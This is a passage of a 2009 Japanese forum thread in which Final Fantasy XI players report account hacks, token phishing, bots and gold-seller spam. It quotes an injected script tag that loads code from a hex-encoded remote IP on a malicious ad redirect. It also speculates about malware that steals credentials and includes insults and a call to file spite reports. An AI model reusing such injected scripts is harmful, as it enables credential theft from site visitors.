そういう間柄の奴があることないこと吹聴するから
456既にその名前は使われています:2009/08/17(月) 08:05:50 ID:Gg65LjOb
そんな吹聴を真に受けるどうしようも無いやつなんて、どうでもいいのに。
神経質だよ。
ある意味、晒した馬鹿の思う壺。
457既にその名前は使われています:2009/08/17(月) 08:11:23 ID:tAmZ+jrj
ツール使用は、罠ツールなどのリスクを理解したうえで使用する限りにおいて
利用者のアドバンテージだってコミュニティ管理担当者トップが公言する世界で
どうでもいいですよねwwwwwwwwwwwwwwwwwwwwwwwwwwwww
458既にその名前は使われています:2009/08/17(月) 08:13:17 ID:PdCQeraN
調べるのはSTTの仕事
459既にその名前は使われています:2009/08/17(月) 09:12:43 ID:aa7z4dIr
猫鯖はGMをかたった犯罪TELLとRMTのTELLと業者PTが急増中。。。
460既にその名前は使われています:2009/08/17(月) 09:19:11 ID:7jt8DSnW
KujataのBototoとTolliliは先週STFに通報済み
処分されなければ 2垢使ったPCの金策の可能性もあるかもね
取引するまでBAN出来ないだろうし様子見だね
461既にその名前は使われています:2009/08/17(月) 11:20:48 ID:rGpQSwSQ
諦めの境地
462既にその名前は使われています:2009/08/17(月) 12:28:54 ID:NgTDwPBN
諦めの境地w
463既にその名前は使われています:2009/08/17(月) 13:40:37 ID:hD+QEIM1
>>421
ぐるぐる回りながらチョコ堀でツールと思われるのか
昔スキル上げるためにアナログスティック固定してよくやってたわ
人目に付かないとこだけどね
464既にその名前は使われています:2009/08/17(月) 13:41:18 ID:GmxJaeqi
209
465既にその名前は使われています:2009/08/17(月) 14:08:44 ID:K67YwG6Q
最近業者多くない?
tellもひっきりなしに来るし24時間稼働してる狩キャラも復活してきてる
466既にその名前は使われています:2009/08/17(月) 14:58:36 ID:NgTDwPBN
業者テル来るのだいたい深夜十二時回ってから
明け方にかけてだから日本のプレイヤーは殆ど知らなさそう。
467既にその名前は使われています:2009/08/17(月) 15:12:02 ID:b8ZEZWwf
>>463
本人乙wwwww
GMは一応仕事したのか。給料泥棒には変わり無いけどWWWW

で、今どんなきぶん?
わざわざ同じ内容の自分が書いたんじゃないblog探して来て、
怨み晴らそうと釣り針一生懸命探して来たのを見抜かれたってどんな気分?
468既にその名前は使われています:2009/08/17(月) 15:17:21 ID:IXO4sj4D
なつのこうさく

れんだついてる コントローラで アナログのまるいところどうし わごむで くくる
469既にその名前は使われています:2009/08/17(月) 15:17:37 ID:41ttRGG0
業者かよくわからん奴が増えたな
3垢4垢で狩してる奴をよくみかけるようになった
バザコメが日本語だったりするので判断に苦しむ
でも複数キャラ操作するのにツール使ってる可能性高いしみすみす見逃すより通報したほうがいいのかねぇ
470既にその名前は使われています:2009/08/17(月) 15:29:08 ID:H06lYamW
ヴァナの平和を守るんだ!
471既にその名前は使われています:2009/08/17(月) 15:38:06 ID:4tWulQOA
>>463
そんなこと西アルテパ砂漠でしても 枯れているから無駄に野菜消費するだけだよ
Botの可能性があるっていったのは 3分毎にアイテム補充のタイミングで掘っていたからね
コントローラー固定程度ではできない事でしょ
472既にその名前は使われています:2009/08/17(月) 18:12:49 ID:Flya9xsZ
      M
     (Θ∋
   ,,,,,;(( ゚Д゚)) <267age
  ,.;゙; (ノ."""';)
  `'ヾ;, ,.  , .;'
     '∪''∪
473既にその名前は使われています:2009/08/17(月) 19:01:51 ID:yA9HSKqC
サポセン糞杉だろ
情報が間違ってて本人確認の検索が出来ませんとか言ってるけど、プレイオンラインIDが分かれば普通検索出来るだろ糞が
474既にその名前は使われています:2009/08/17(月) 19:06:21 ID:PdCQeraN
>>473
登録情報をちゃんと答えられないと、正式な所持者なのか垢買いか分からないからねぇ
で、どうなさいました?
ハックですか?
475既にその名前は使われています:2009/08/17(月) 19:18:09 ID:yA9HSKqC
ハックされてパス変えられてるから新しいパス欲しいんだけどさ
4年位前に登録した情報だから全く覚えてないのよ
電話番号も家のか携帯の方か忘れたし、住所も入会した辺りに市分けで変わってどっちか忘れたし・・・
一応どっちの情報でも入力して3回位チャットサポートの方に行ったけど「本人確認にはいたりませんでした」
って言われて終わり。
476既にその名前は使われています:2009/08/17(月) 19:22:24 ID:BV0MFdkf
>>475
おまいの落ち度じゃないかw八つ当たりワロス
そんな情報でIDパス再発行されるなら他人の垢簡単に乗っ取れるんだからできないで正解
477既にその名前は使われています:2009/08/17(月) 19:23:11 ID:WuH/ZHxr
>>475
そりゃ仕方ない、本人確認には複数の登録情報と一致する必要があるんだから

なんとか登録時の情報を探しだすしかないよ
それが出来なかったら一からやりなおすしかない
478既にその名前は使われています:2009/08/17(月) 19:23:50 ID:NgTDwPBN
>>475
警察通した方が早そうだね。
スクエニが本人確認のための協力を惜しんでいて
所有権を取り戻せない、って事を言えばいいと思うよ。
479既にその名前は使われています:2009/08/17(月) 19:26:58 ID:PdCQeraN
>>475
そこまで曖昧だとどうしようもないわなー
でも先に「覚えてないんですけど」って前置きして、「○○か○○だと思います」って言えば
通してくれたんだけどな。去年
480既にその名前は使われています:2009/08/17(月) 19:27:26 ID:WuH/ZHxr
>>478
この場合、登録情報を忘れた方に過失があるから
その言い分は通らないな
481既にその名前は使われています:2009/08/17(月) 19:33:04 ID:CgR2UGPx
14では徹底的に外人排除の方向で
482既にその名前は使われています:2009/08/17(月) 19:37:24 ID:YE3q/l6L
登録情報をまんま伝えられる家族でさえ
本人じゃないと分かると受付けさえしなくなったのだから
(以前は登録情報の確認はするけど、各種手続きは家族と分かってても受付してくれた)
今は厳しくなったからそこまで登録情報が曖昧だとダメだろうなあ
本人確認の身分証を提出するぐらいの事すればあるいは大丈夫かも分からないけど
483既にその名前は使われています:2009/08/17(月) 19:45:53 ID:NgTDwPBN
>>482
>本人確認の身分証を提出するぐらいの事
普通はオペレーターがそう言う話しまで誘導してくれると思うんだけれど
ネトゲ(スクエニ)ではたかだかゲーム、だからってそこまではしてくれないの?
484既にその名前は使われています:2009/08/17(月) 20:00:58 ID:H06lYamW
今回の件に関して言うと、チャットサポートの事前本人確認のところで
機械的に門前払いされてるみたいだから、オペレーターまで到達できてないんじゃないかな。
サポセンに電話して正直に打ち明ければ誘導してもらえると思うけど。。。
485既にその名前は使われています:2009/08/17(月) 20:05:37 ID:wscsPt9H
>住所も入会した辺りに市分けで変わってどっちか忘れたし・

IDを郵送してもらえば?
住所がムーミン谷だったら打つ手無しだが。
486既にその名前は使われています:2009/08/17(月) 20:10:52 ID:Nzzzeo9Q
>>475
登録の時に送られてくるハガキどうしたんだず
487既にその名前は使われています:2009/08/17(月) 20:22:53 ID:YE3q/l6L
>>483
いや、サポセン側からそういった申し出はしないと思うよ。

例外的な事を、あえてわざわざ企業側から提案したりはしないよ。
個人情報に関して更にトラブルを招く恐れもある事だし。

ただユーザー側から、身分証や住んでいた住所を何か証明出来るものとかがあれば
あるいはそれで、本人確認が取れればOKが出るかもしれないね、という
交渉しだいでは何とかなるかもしれけど、というあくまで仮定の話ね。
488既にその名前は使われています:2009/08/17(月) 20:25:55 ID:41ttRGG0
今でも業者tellが引っ切り無しに飛び交っていて
スクエニが業者のアカウントハック対策をしているのか疑問なんだが
その点は問題視されないのかね?
489既にその名前は使われています:2009/08/17(月) 21:08:31 ID:7eB5mQX7
>>484
細かい事は忘れたけど、「チャットサポートの本人確認」ってオペレーターに聞かれて1つづつ答える奴だよ。
今年の頭に2年ぶりに復帰しようとしたがパス忘れてて問い合わせたんだが、情報適当に入れてて合わず。
ただ、倉庫キャラはどんなのを作ってたとか課金止めたのはいつ頃だとか、○じゃなければ×かもしれないとか
そういう答え方でも本人だと認めてくれたから、最終的には発行してもらえた。かなり色々答えたけどねw

でもそこで発行してくれたパスがあわなくてログインできず、再度問い合わせたら門前払いされたし
オペレーターのさじ加減1つなのかもしれんな。昨日はこれで通ったんですがって言ったら通してくれたけど
その後なんで情報適当に入力したのかとか色々問われて怒られた。
490既にその名前は使われています:2009/08/17(月) 22:29:53 ID:Xe2qkFkb
おやすみage
491既にその名前は使われています:2009/08/17(月) 22:53:04 ID:66qMRexj
今FFAHでノートン先生が反応する
Bloodhound.Exploit.266
使ってる人は気をつけて
一応報告まで
492既にその名前は使われています:2009/08/17(月) 23:56:39 ID:HtiKXHBS
>>471
仕様変更前じゃねーの?

あと、他人のレス見て即、業者と判断してる奴いるけど、
頭足りないんじゃないかと思う
493既にその名前は使われています:2009/08/18(火) 00:26:52 ID:28EJyM/E
Caitsith
北サンドJ-8で離席玉出して絶賛寝釣り中
Donryu
通報支援よろ
494既にその名前は使われています:2009/08/18(火) 00:34:06 ID:iE8dzer/
仕様変更で変わったのは 3分毎の追加数と 一日の上限が100になっただけのはず
仕様変更前も後も エリア枯れしたら次の補充まで掘れなくなるよ
495既にその名前は使われています:2009/08/18(火) 00:45:05 ID:74fkB6v+
>>492
はツール販売者か。本当必死だな。

実際にアルテパに見に行けば解るよ。
そこに突っ立って回転すらしないで動かないPC。こいつらツールで掘ってた奴だからちょっと腹が立つ事があれば、通報してうさばらしすればいいよ。
496既にその名前は使われています:2009/08/18(火) 00:50:31 ID:QIoQdZED
>>493
ま た 粘 着 か

…と思ったが倉庫で確認してきた。
離席マーク付けてるのでtellは届かないので、sayと/pokeしてみたが、反応なし。
中の人不在は間違いないと見た。

通報支援age
497既にその名前は使われています:2009/08/18(火) 00:56:34 ID:nGm2ieBH
100制限下でBOTとか(苦笑)
498既にその名前は使われています:2009/08/18(火) 01:11:34 ID:QIoQdZED
一応突っ込んでおくが北サンドじゃなくてサンド港だったけどなw
499既にその名前は使われています:2009/08/18(火) 01:15:56 ID:28EJyM/E
うお、スマン吊ってくる λ...
500既にその名前は使われています:2009/08/18(火) 01:23:52 ID:GKlFPIEO
業者くさいのから「wo ri ni ma」ってテルがきたんだが、誰か意味わかる?
場所も離れてるし、最近業者虐めてないのに気味が悪い
501既にその名前は使われています:2009/08/18(火) 01:50:09 ID:QdcbikLh
>>491
見る前に開いてしまった
Sleipnirがダウンしちゃったよ…
ディスクのスキャン中…
502既にその名前は使われています:2009/08/18(火) 01:55:41 ID:QRnI/Pf4
>>500
wo=俺
ri =レイプする
ni =お前の
ma=かーちゃんを

犯罪予告だな
503既にその名前は使われています:2009/08/18(火) 02:15:40 ID:HiCHp/3v
>>493
寝釣りはGM呼んでその場で声かけてもらって対処してもらうのが一番。
504既にその名前は使われています:2009/08/18(火) 04:58:07 ID:/KzK3V8u
>>463の書き込みは俺だけど>>467の意味がわからない
505既にその名前は使われています:2009/08/18(火) 05:10:01 ID:IwjV7+BI
2垢でドラクエ走りしてるとよくツンツンされたらバシッと叩かれたりするけどやめてください><
506既にその名前は使われています:2009/08/18(火) 09:06:41 ID:HrekJkMm
>>500
とりあえず中国語としてグーグルで翻訳してみた。
意味は分からんw
http://translate.google.co.jp/translate_t?js=n&prev=_t&hl=ja&ie=UTF-8&text=wo+ri+ni+ma&file=&sl=zh-CN&tl=ja
507既にその名前は使われています:2009/08/18(火) 09:18:06 ID:UfsgfxtK
トークン使ってるけどハックされたよ…
どうやったんだろうね
スキャンかけてもトロイも出てこない
508既にその名前は使われています:2009/08/18(火) 09:19:51 ID:Z+M2egaS
またハック増えてるのかね…こえぇ
509既にその名前は使われています:2009/08/18(火) 10:44:00 ID:brpHy8ah
保守
510既にその名前は使われています:2009/08/18(火) 10:46:59 ID:GgsAPmdc
>>508
一応聞いておくけど、「FFのアカウント」がハックされたのか?
まさか別ゲームじゃあるまいね。

トークンは、パスを抜かれたりしても抜いたやつが成りすまして入るのを防ぐってだけで、
抜かれること自体を防ぐわけじゃない。
もし、別のゲームで同じID/passを使ってたら、そちらで使われることもありえる。
511既にその名前は使われています:2009/08/18(火) 10:49:00 ID:Z+M2egaS
俺はパス抜かれてないお
512既にその名前は使われています:2009/08/18(火) 10:56:56 ID:GgsAPmdc
ごめんよー、取得ログがずれてた。
>>507だね。
513既にその名前は使われています:2009/08/18(火) 11:00:35 ID:6mvGeHlS
507でっす。
抜かれたのはFFだけ(今のところ)
トークンに登録してる2アカともやられちゃったw
514既にその名前は使われています:2009/08/18(火) 11:04:07 ID:ifrdi9iM
>>513
まあテンプレも書かずに騒いでも
相手してられないっていう。
515既にその名前は使われています:2009/08/18(火) 11:25:30 ID:b/1gSgqu
トークン登録してワンタイムパスめんどー
解除しちゃえ
ハックされました
じゃねーの?
516既にその名前は使われています:2009/08/18(火) 11:30:08 ID:6mvGeHlS
507でっす。
解除もしてないよ〜
いつもどおりなんだけどね。
ごめんね、テンプレもよんでないw
トークンだからって安心してたけど、そうでもないんだなって
一応報告だけ
517既にその名前は使われています:2009/08/18(火) 11:34:43 ID:xxahDrrS
例のフィッシング詐欺とかいうやつかね
518既にその名前は使われています:2009/08/18(火) 11:38:20 ID:6mvGeHlS
フィッシングもちがいますね〜
あ、507です
昨日FF11AH変じゃなかった?
関係ないかな
519既にその名前は使われています:2009/08/18(火) 11:43:30 ID:dg2bQe1u
トークンのワンタイムパス表示後すぐにパスを業者に教えて>>507はログインせずに放置でもしていないとムリじゃね。
ネタでないのなら、おまえが「わからない」の一点張りで情報が出てこない以上ここに書いてもムダだから
サポセンに電話しとけ。
520既にその名前は使われています:2009/08/18(火) 11:52:34 ID:4pJFP7wr
んだね 情報出す気のないやつに関わるだけ時間の無駄だわ
521既にその名前は使われています:2009/08/18(火) 12:00:33 ID:6mvGeHlS
507です。
何の情報を出せばいい?
ウザイならもう書かないw
ごめんなさーい
みんなきおちけてね〜
(私ほど気をつけてない人はここにはいないとおもうけどw
522既にその名前は使われています:2009/08/18(火) 12:03:32 ID:dg2bQe1u
業者のtellもうざいがNAの猥談シャウトもうざいな。
523既にその名前は使われています:2009/08/18(火) 12:55:24 ID:xLvHIUJa
最近RMT業者は獣人支配にして特産品の転売を目論んでいるな
各地で自殺するやつを見かける
524既にその名前は使われています:2009/08/18(火) 13:23:33 ID:DHKFsr01
>>523
シンク用じゃないの?
525既にその名前は使われています:2009/08/18(火) 13:45:35 ID:Gq4i/F1l
私も今日ハックされました;;
原因は多分AHおかしかったもんね
鯖移転されててアイテムとかもなくなってた、泣けてきた
526既にその名前は使われています:2009/08/18(火) 13:50:05 ID:JV9MICfp
そんだけこまめにレスするならテンプレに沿った報告しろよ。
どうせFPのバージョンも最新だと思います程度ろうが。

正直住人のほとんどは被害者の救済じゃなくて業者の新手口の
監視が目的だからそんなんじゃまともに相手されないぞ。
527既にその名前は使われています:2009/08/18(火) 13:53:17 ID:IwjV7+BI
POLアカウントIDのみのやつは終わってる
アカハックされても擁護できん
528既にその名前は使われています:2009/08/18(火) 14:03:41 ID:6mvGeHlS
507です。
仕事終わったらテンプレに沿って書いてやるから
カルシウム補給して待っとけよ!

FPのバージョン?最新じゃないと思いますw
ハック対策もトークンあるから安心(はーとくらいにしか思ってなかったし、
PCのことはよくわからないので、いらっとくるよw
529既にその名前は使われています:2009/08/18(火) 14:10:15 ID:NoH3OF4f
参考にならなすぎる
反面教師にしかならないな
530既にその名前は使われています:2009/08/18(火) 14:31:31 ID:KInSgRqj
実績あるDIGIPASSのトークンによるセキュリティ破って手に入れたものがFF11のアカウント2つとか信憑性なさすぎてもう
531既にその名前は使われています:2009/08/18(火) 14:35:44 ID:Jc9V5pd2
FFAH毎日チェックしてるけど何ともないな?
ads●ffxiah●comをhostsファイルで遮断してるからかな?
532既にその名前は使われています:2009/08/18(火) 14:36:03 ID:YnJJeTK7
>>528
サポセンに状況を説明して指示仰げ

ウザイから二度と来るな
533既にその名前は使われています:2009/08/18(火) 14:39:22 ID:QjRpy5AW
>>531
Yes
FFAH本体が改竄されたことは今のところ無いね。
534既にその名前は使われています:2009/08/18(火) 14:40:56 ID:P1LcNwL6
ID:6mvGeHlSといいID:Gq4i/F1lといいなんでハックされる人ってこんなに馬鹿なの?
馬鹿だからハックされるんだと思うけどひどすぎるだろう
535既にその名前は使われています:2009/08/18(火) 14:51:47 ID:GHboHV0q
トークン利用者がハックされた場合、巻き戻しは何回でも「無料」のはず。
基本的にハックが「ありえない」想定だからね

公式が告知してるフィッシングサイトにID/Pass/トークンPassだけ入れて、FFにその場でログインしなかったとか
そういうことやっちゃったんじゃないかなぁ・・・
536既にその名前は使われています:2009/08/18(火) 14:58:37 ID:UIaUySMF
いやしかし、お馬鹿なユーザーで脆弱性のあるPC環境でも
トークン登録しててハクられる事なんてあるんだなー。
537既にその名前は使われています:2009/08/18(火) 15:01:11 ID:NoH3OF4f
>>536
ワンタイムパスは、入力して認証させないかぎり数分間くらいは有効なんだよ
だから、よそのサイトでIDパスとワンタイムパスを入力させて盗んで、
盗んだ側がすぐにそれを使ってPOLログイン=ハックすることができるわけ。
今はそっちが主流じゃないかな。
LSコミュのログイン画面に似せてるフィッシングサイトとかあるらしい
538既にその名前は使われています:2009/08/18(火) 15:03:05 ID:h7yMivlT
昨日20時頃、垢ハック寸前のようなもの報告
状況 トークン使用、スクエニ垢は嫁と共通
嫁がログインしようとしたところ、スクエニ垢のパスワードが通らない
俺も自分の垢から試したけど通らないので、スクエニアカウント管理システムから強制的にパス変更

・・・と、ふとキーボードを見たらCapsLockがonになってた
みんなも気をつけてな!
539既にその名前は使われています:2009/08/18(火) 15:07:21 ID:uNQF1jSj
だな、トークン破るとしたら今の所フィッシングサイトに引っかかったとしか思えない。
あとPoLクライアントソフトを偽装されたとかだな、フィッシングの延長でしかないが。
540既にその名前は使われています:2009/08/18(火) 15:14:54 ID:UIaUySMF
なるほど・・偽装サイトでトークン番号も盗まれるのか。
トークンの標示は30秒くらいで消えてしまうが、数分有効だったとは。

しかし、1,2年前に赤ハックが猛威を振るってた時、
散々FFAH(の主に広告?)の危険性は騒がれてたってのに・・・未だに見てるのが居るのか。
541既にその名前は使われています:2009/08/18(火) 15:17:21 ID:h7yMivlT
気になるのはうちのトークンの番号、覚えやすいような数字なんだよね
587697みたいに。
あえてそう言う数字を出力してるのかもしれないけど解析できそうでちょっと不安だな
542既にその名前は使われています:2009/08/18(火) 15:26:02 ID:z5mCEoey
さっきあったウィルスバスターの更新で、OS再起動させられたんだけど、
再起動時にVGA画面でなにか作業してた、ルートキット対策かなー
543既にその名前は使われています:2009/08/18(火) 16:56:17 ID:UPrzUYIZ
FFAH自体超グレーサイトだが■関係者か業者が
絡んでるから放置ってサイトじゃなかったっけな

つかAHで複アカがバレるみたいだがそれもかなりやばくないか?
競売専門アカで履歴残し用の1ギル出品おとしちまったんだが
競売アカ落としてる状態で別垢のメインキャラにtell送られてきたぞ
いきなり『垢変えてにげるんじゃねーよ』とか送られてきてビビったわ
そいついわくAHで追跡できるから揉めたくなければ即返せつってきた

AHの仕組みが分からんが複垢がばれてるって事はリアルデータも
簡単に流出してそうな気がするんだが・・・
544既にその名前は使われています:2009/08/18(火) 16:57:25 ID:dg2bQe1u
GMコールしろよ。
545既にその名前は使われています:2009/08/18(火) 17:02:23 ID:IwjV7+BI
アカハックに備えてスクエニアカウント作っといて登録時と違う住所を入れるといい
本当の住所メールアドレスしってればアカ巻き戻しもスムーズに行く
忘れたらお疲れ様だけど
546既にその名前は使われています:2009/08/18(火) 17:39:32 ID:ecyHllYA
tel売り込みは来たら即BLしてコールしてるけどな
んでBLリスト貯まってきたら上から削除、どうせその頃にはそのキャラ削除されてるしw

定型文メッセージだけだけど、俺はこのほうが気楽だ
報告内容はPC名とメッセージ内容を送るだけ、GMからtel来たところで報告内容は変わらんし
却って気軽にばんばん送れる
547めも:2009/08/18(火) 17:43:05 ID:VpSMJ/oW
FFXIAHの飛ばし先 sakuraのサブドメインで
そのサイトいってみたら<SCRIPT SRC=HTTP//0x6ea52967:888/jp■js></script>
発見 
548既にその名前は使われています:2009/08/18(火) 17:46:10 ID:nnvY17Fl
>>541
マーフィーの法則で意味ありげな数列の方が記憶に残りやすいだけ。
あとボナンザスレでもあったが0〜999までの3桁の時点で少なくとも2つの数字が一致するのは
1000個の内、270個程度もあったからこれが6桁になると相当高い割合になると思われる。
同じ数字が2つ出てくる数は確率が低いと思い込みランダムじゃないような錯覚がするが、
桁数が多くなればなる程逆に確率は極めて高くなる。
549既にその名前は使われています:2009/08/18(火) 18:00:54 ID:z5mCEoey
inetnum: 110.165.32.0 - 110.165.63.255
netname: FKT-HK
descr: Flat/Rm D Block 1, 8/F
country: HK   → (香港)

国が中国から香港になってる。
550既にその名前は使われています:2009/08/18(火) 18:10:31 ID:uNQF1jSj
あげやうや
551 [―{}@{}@{}-] 既にその名前は使われています:2009/08/18(火) 19:08:33 ID:qZUmDEsd
>>541
5ゾロだったことが数回あるw
552既にその名前は使われています:2009/08/18(火) 19:32:29 ID:P1LcNwL6
さっさと24時間活動のハンター業者消してくれないかなー
1日でどれだけのギルが業者に渡ってると思ってるんだ
553既にその名前は使われています:2009/08/18(火) 19:38:13 ID:KilKbK4B
YorieさんLS資金返してください><
554既にその名前は使われています:2009/08/18(火) 19:48:37 ID:Yx87uZWN
agero
555既にその名前は使われています:2009/08/18(火) 20:13:29 ID:GKlFPIEO
>>502>>506
亀だけどさんくす
やはり罵倒系だったんかね
556既にその名前は使われています:2009/08/18(火) 20:13:30 ID:xqmbla4O
>>543
どっちのキャラも/anonにしていなかったと予想。
POLのサーチでメイン垢バレてtell送られたんだろう。
557既にその名前は使われています:2009/08/18(火) 20:18:07 ID:dg2bQe1u
ヤツラは罵倒目的以外でピンインtell/sayをしない
558既にその名前は使われています:2009/08/18(火) 20:41:19 ID:GKlFPIEO
確かに罵倒するときはいつもピンインだったなw
大昔にハンターへcao ni maって試しに送ったらスゲー量のテルきたっけ
559既にその名前は使われています:2009/08/18(火) 22:11:30 ID:QZl3pC0j
age
560既にその名前は使われています:2009/08/18(火) 23:13:01 ID:UPrzUYIZ
>>556
遅レスだがメイン垢と競売キャラ垢は別パッケだよ
メイン垢はPS2、競売垢はPCを使ってる

だから俺自身が言いふらすか競売垢で買った高額装備でも
身に着けていないと絶対にバレないはずじゃね?
ちなみに1ギル出品で落としたアイテムも後で使おうと
競売垢に持たせたままログアウトさせてる

普通に考えればバレる可能性は0%と言ってもいいはず
AHの機能を調べたいがウイルス広告あるようだし
さすがに怖くて開けないって・・・orz
561既にその名前は使われています:2009/08/18(火) 23:14:23 ID:W0guv7m9
FirefoxでNoscriptいれた上でネット閲覧用PCを使って見ればおk
562既にその名前は使われています:2009/08/18(火) 23:15:51 ID:IwjV7+BI
オンラインステータスを隠れる+anonで見えなくなるんじゃないの?
POLのフレンドサーチだよな?これで自分のキャラサーチしたら見えないんだが

563既にその名前は使われています:2009/08/18(火) 23:46:23 ID:r1BQB1eo
>560
それ限りなく身内が怪しくないか・・・w

そしたら「身内には言ってないです」なのか?
564既にその名前は使われています:2009/08/18(火) 23:52:43 ID:Cnm5uhO6
>>560
まぁ何はともあれ1ギル出品しといてそんなtell送ってくる馬鹿には
返品しなくていいよ・・・システム上GM呼ばれてもお前には非はないし
そんなtellしてくるやつのほうが気持ち悪い
565既にその名前は使われています:2009/08/19(水) 00:08:14 ID:Argt5f8a
adobeのページに行こうとすると韓国のipをブロックしまくるんだが
566既にその名前は使われています:2009/08/19(水) 00:50:02 ID:c6b1UDsR
今宵は生き残れそうにないねぇ
567既にその名前は使われています:2009/08/19(水) 00:58:30 ID:mm9dsio5
age
568既にその名前は使われています:2009/08/19(水) 01:46:17 ID:wDPaa7OY
---------アカハック被害報告----------
●気付いた日時、状況
 8月17日18時半前頃イン(windower使用)、競売チェックして放置
 数分後戻ると落ちてた(エラーメッセージ等はなし)
 インしてから20分くらいだと思う
 すぐログイン、ID・パス(トークン)入力、接続していますの画面から進まないので
 ツールバーから閉じる、を5回くらい繰り返す(この時「このプログラムは応答していません」のエラーメッセージが毎回出てた)
 もうひとつ、おなじトークンに登録しているアカでイン(windower使わずに)。
 普通に入れたので、入れないアカのほうのキャラをサーチしたら
 最初にインしたのとは別のキャラ発見(サンドリア南競売前)
 王国制式礼服は脱がされ、他の装備はそのまま→ヒーリングログアウトしてった
 見つけたときにGMコール、アカブロックしてもらった
569既にその名前は使われています:2009/08/19(水) 01:52:36 ID:wDPaa7OY
●不審なアドレスのクリックの有無
 FF11AHはほぼ毎日、あとwiki
●他人が貴方のIDを使用したことが一度でもあるか(Yes/No)
 No
●ID・Passの認証方法
 トークン使用、IDは手打ち
●Pass変更の履歴
 トークン使い出してからは変更してない
●他人が貴方のPCを使う可能性の有無
 No
●ツールの使用の有無
 Yes windower
●ネットカフェの利用の有無
No
570既にその名前は使われています:2009/08/19(水) 01:56:11 ID:G8I0WssL
ログイン中に中断されたってことはワンタイムパスのフィッシングでもないし
どうやってハックされたんだ。垢買いとかいうギャグではないんだよな?
あとツーラー乙
571既にその名前は使われています:2009/08/19(水) 01:56:53 ID:wDPaa7OY
●使っているOS
Windows XP Home Service Pack3
●使用ブラウザ
IE7
●WindowsUpdate
 最終更新日2009年8月14日
●FlashPlayerとRealPlayerのバージョン
 FlashPlayer10
●アンチウイルスソフト
 avast! 4 Home Edition
●その他のセキュリティ対策
●ウイルススキャン結果
 ハック後カスペルスキー入れてスキャンで出たのが
 C:\Program Files\Adobe\Acrobat 7.0\Reader\plug_ins\Annots.api
 C:\WINDOWS\system32\Macromed\Shockwave 10\SwOnce.dll
 C:\WINDOWS\system32\Macromed\Flash\Flash10b.ocx
572既にその名前は使われています:2009/08/19(水) 01:58:13 ID:wDPaa7OY
●スレログやテンプレを読んだか
 Yes
●hosts変更
 無
●PeerGuardian2の導入
 無
573既にその名前は使われています:2009/08/19(水) 01:59:37 ID:wDPaa7OY
●その他情報・症状など
 2アカ目も22時くらい?ハックされた
 (最初のアカがハックされた時インして1時間くらいでログアウト。次に
 インしてから20分後くらいに切断された)
 ジュノ港で競売見てたら突然落ちた(エラーメッセ等なし)
 ログインしようとしても最初と症状おなじ
 20分後くらいに普通にインできた。
 キャラはジュノ港競売前から、すぐ近くの階段上がったところに移動
 所持金0、ポストを見たらギルのみ消えてった。
 全4キャラ中2キャラがギルのみなくなって、他は被害なし
 お金持ってないキャラはモグハから移動もしてなかった(被害なし
 こっちはGMコールで報告のみ
 どっちも切断時のエラーがでなかったのと、ログインして20分後くらいに
 突然落ちて入れなくなった
 FF11ログイン時以外でID・パスを入れたことはない
 (トークン購入時に公式サイトに入力はした)

以上です。ツーラー乙
574既にその名前は使われています:2009/08/19(水) 02:06:59 ID:Z3pmUfLf
とりあえず
ツーラーざまぁああああw
で良いかな
575既にその名前は使われています:2009/08/19(水) 02:10:50 ID:4lBRNwae
業者乙でよくね?
576既にその名前は使われています:2009/08/19(水) 02:17:16 ID:ALY7Of8S
>>571
flashのバージョンはもっと細かい。
基本的に最新版以外はザル。
ここで調べれ。

http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
577既にその名前は使われています:2009/08/19(水) 02:18:31 ID:XG/+giKV
アカ買いかね。
トークン関連で○○された!って言ってくる奴の
馬鹿とツーラー率の高いこと。
578既にその名前は使われています:2009/08/19(水) 02:27:19 ID:r7TipUZW
それでサポセンの対応は?
579既にその名前は使われています:2009/08/19(水) 02:29:51 ID:Pa4C84o3
ツーラー乙で終わっちゃ、このスレらしくない。

エラーメッセージなしで落とされて、20分ほどログイン不可能。
その間にやられる、ということは。

1. POL/FFにログインしてしばらくしたらクライアントを落とす
2. 再ログインしようと入力したID、ワンタイムパスなどを横取り・送信

こんな動きをするマルウェアが存在するのかも。
580既にその名前は使われています:2009/08/19(水) 02:33:20 ID:HEHqKwJe
自動翻訳の役が

crecente: カズがステージに向けて何か大きな平井


でクソワロタ
581既にその名前は使われています:2009/08/19(水) 02:42:39 ID:r7TipUZW
ぶろされ。こm tellうぜー
582既にその名前は使われています:2009/08/19(水) 02:43:00 ID:4Ebsqhip
スレの保守してくれようと
時間をかけて一所懸命ネタ考えてくれたと思えばありがたいじゃないかい
583既にその名前は使われています:2009/08/19(水) 02:51:35 ID:zxbLSKPu
なるほどな・・・エラーメッセージなしでFFが落ちて、再ログインで入力するID/PASS/onePass横取りとは
糞業者も考えたなぁ・・・それなら有効なonePassが入手できるもんな・・・くやしいが・・・

【質問】
「エラーメッセージなしで落ちる」というのは FF(POL.exe)自体が強制終了されるのかな?やっぱり
回線切断・後追いログインだと、クライアント自体は落ちないで、POL-xxxxって画面にエラー出るよね

【対策?】
FFがクライアントごと強制終了で落ちる(一昔前のビシージで強制終了とか)した場合は、面倒でも
タスクマネージャー等で実行プロセスを確認した後→再度ログイン とするしかないのか・・・
普段どんなプロセスが走ってるか見てない人にはキツイな・・・

まあ、ツーラー乙なんだけど、こういう手口はじきツール経由からweb経由になるだろうから自衛するに越したことは…
584既にその名前は使われています:2009/08/19(水) 02:55:05 ID:XG/+giKV
確かに、いつだかのウイルスの時は
最初は報告者が
「怪しいサイト踏まずに抜かれるわけない。ツーラー乙」で
全然信じてもらえなくて被害が広がってからようやく信じられた
って経緯があるから、どんな話でも一応本当だと思って聞かないとなんだよな。
全力で釣られるのがネ実民。

あれじゃね?
対策としてはトークンの数字出してから待ってワンタイムパスが変更される直前でログイン。
やり方もタイミングもわかんないけどきっとそう。
585既にその名前は使われています:2009/08/19(水) 02:58:42 ID:+h4io/bD
どんなツールか知らないんで調べてみた

windowerとはこんなツールです

1台のPCでFF多重起動
テクスチャはがし
PT・アラのMP/TP表示
スクリプト実行による無限の長さのマクロ
装備変更の自動化
行動や時間/曜日/月齢/天候変更をトリガーにしたスクリプト実行
リキャスト表示
タゲとの距離表示
FF画面のログにタイムスタンプ
その他諸々
586既にその名前は使われています:2009/08/19(水) 03:00:17 ID:24mB7Co0
Windowerで怪しいプラグイン入れたんじゃねーの
587既にその名前は使われています:2009/08/19(水) 03:03:08 ID:ew7wUP77
PS(笑)の人は使えなくて残念ですね^q^
588既にその名前は使われています:2009/08/19(水) 03:05:37 ID:zxbLSKPu
Windowerってたしか デフォで競売見たときの履歴だとか、他人の装備見たときの装備データ(レリックとか?)
